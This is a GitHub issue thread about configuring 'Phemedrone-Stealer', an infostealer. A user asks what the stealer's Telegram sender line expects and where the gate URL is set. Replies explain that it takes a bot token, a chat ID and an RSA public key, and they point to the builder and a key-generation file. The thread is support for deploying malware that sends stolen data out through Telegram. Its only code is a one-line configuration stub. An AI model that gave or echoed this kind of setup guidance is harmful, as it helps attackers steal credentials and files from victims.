### ISSUE TITLE
Config Quick question

### ISSUE THREAD

**Issue by shorefall** [REvorker1/Phemedrone-Stealer#3]
Very cool software thank you.
public static ISender SenderService = new Telegram("", "", "");
In this line above, what is expecting token>id>and?
thanks

**Comment by REvorker1** [comment]
You have to enter a public key. I'd recommend using builder to build the stealer.

**Comment by shorefall** [comment]
> You have to enter a public key. I'd recommend using builder to build the stealer.

Yeah the builder did not compile
And the one in release in backdoored

**Comment by REvorker1** [comment]
which?

**Comment by REvorker1** [comment]
and if you cannot compile builder that doesn’t mean it’s not working and moreover it’s backdoored

**Comment by mitsuaka** [comment]
> Very cool software thank you. public static ISender SenderService = new Telegram("", "", ""); In this line above, what is expecting token>id>and? thanks

telegram constructor takes 3 arguments, which are bot token, chat id and rsa public key. an implementation of generating rsa key pair might be seen [here](https://github.com/REvorker1/Phemedrone-Stealer/blob/master/Phemedrone.Tools/RsaClass.cs#L63)


> And the one in release in backdoored

can't really understand where you found release files malicious, so for everyone wondering about virus threats in Phemedrone.Tools.exe, check out [virus total report](https://www.virustotal.com/gui/file/4c198c2fc8775cdf5209b51e0bac054fc1c7cced727152275d10317b5bdfe56a/relations), which shows that the only connected ip addresses are microsoft application tracking ips, which are default for application. provide proofs before misinforming people

**Comment by shorefall** [comment]
> > Very cool software thank you. public static ISender SenderService = new Telegram("", "", ""); In this line above, what is expecting token>id>and? thanks
> 
> telegram constructor takes 3 arguments, which are bot token, chat id and xml encoded rsa public key. an implementation of generating rsa key pair might be seen [here](https://github.com/REvorker1/Phemedrone-Stealer/blob/master/Phemedrone.Tools/RsaClass.cs#L63)
> 
> 
> > And the one in release in backdoored
> 
> can't really understand where you found release files malicious, so for everyone wondering about virus threats in Phemedrone.Tools.exe, check out [virus total report](https://www.virustotal.com/gui/file/4c198c2fc8775cdf5209b51e0bac054fc1c7cced727152275d10317b5bdfe56a/relations), which shows that the only connected ip addresses are microsoft application tracking ips, which are default for application. provide proofs before misinforming people

Hi thanks for replying!
What about the gate url where is it specified?
